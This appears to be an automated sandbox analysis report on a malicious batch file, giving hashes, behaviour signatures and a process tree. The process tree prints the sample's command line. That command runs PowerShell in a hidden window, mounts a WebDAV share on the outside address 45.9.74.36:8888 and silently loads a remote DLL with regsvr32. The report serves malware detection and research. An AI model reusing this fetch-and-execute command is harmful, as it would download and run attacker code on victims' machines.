Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
23/07/2024, 01:06
Static task
static1
Behavioral task
behavioral1
Sample
892934021166630625.bat
Resource
win7-20240708-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
892934021166630625.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
892934021166630625.bat
-
Size
15KB
-
MD5
8a715f19c3ea412859e3550299aa0b66
-
SHA1
6150ec2f71440f3b4bddd3cc3689a5dc160e50fa
-
SHA256
c1fd5e409b10ec1400d9c433e3d6e781825e8e5485a37491938e4a337c80a871
-
SHA512
9d4a5bfa1a2d04b69b14fc568d6819a41afea96580050e9c0761d5d69c24f0e996c323684b021cd66a2ac6b3aabd6d79ce70f2b98d8f102eefe67f777d72e63f
-
SSDEEP
384:ihe0DgNhHJNnA9IAxS1byuC4Q8W0Zdob/tIxzcCCKtyFD1oI57bBbYg+23kA:5rHJVA9Iuyb3QcdG6zcpKtOJnbBb8akA
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2068 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2068 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2408 wordpad.exe 2408 wordpad.exe 2408 wordpad.exe 2408 wordpad.exe 2408 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2384 wrote to memory of 2408 2384 cmd.exe 31 PID 2384 wrote to memory of 2408 2384 cmd.exe 31 PID 2384 wrote to memory of 2408 2384 cmd.exe 31 PID 2384 wrote to memory of 2068 2384 cmd.exe 32 PID 2384 wrote to memory of 2068 2384 cmd.exe 32 PID 2384 wrote to memory of 2068 2384 cmd.exe 32 PID 2068 wrote to memory of 2816 2068 powershell.exe 34 PID 2068 wrote to memory of 2816 2068 powershell.exe 34 PID 2068 wrote to memory of 2816 2068 powershell.exe 34 PID 2068 wrote to memory of 2836 2068 powershell.exe 35 PID 2068 wrote to memory of 2836 2068 powershell.exe 35 PID 2068 wrote to memory of 2836 2068 powershell.exe 35 PID 2068 wrote to memory of 2836 2068 powershell.exe 35 PID 2068 wrote to memory of 2836 2068 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\892934021166630625.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\15408171637521.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2816
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\15408171637521.dll3⤵PID:2836
-
-